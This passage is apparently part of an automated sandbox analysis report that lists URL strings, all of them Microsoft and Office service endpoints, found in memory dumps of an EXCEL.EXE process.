    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorized
    Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeg
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeh
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeize
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizej
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizek
    Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizem
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizen
    Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizer
    Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizes
    Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizet
    Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeu
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizex
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizez
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize~
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmpString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1MBI_SSL_SHORT
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1T
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://management.azure.com
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://management.azure.com/
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://management.azure.com/d
    Source: EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://messaging.office.com/
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://metadata.templates.cdn.office.net/client/log9
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmpString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBearer
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://ncus.contentsync.
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com
    Source: EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/
    Source: EXCEL.EXE, 00000001.00000003.565716216.0000000012AF8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289524102.0000000012AF8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.600038876.0000000012AF8000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules
    Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules?Application=excel
    Source: EXCEL.EXE, 00000001.00000003.289495071.0000000012AA6000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.4954.1000&ClientId=
    Source: EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com6
    Source: EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com~
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmpString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecordhttps://login.windows.net/co
    Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmpString found in binary or memory: https://o365auditrealtimeingestion.manage.office.comBearer
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620001254.000000000F47D000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://officeapps.live.com
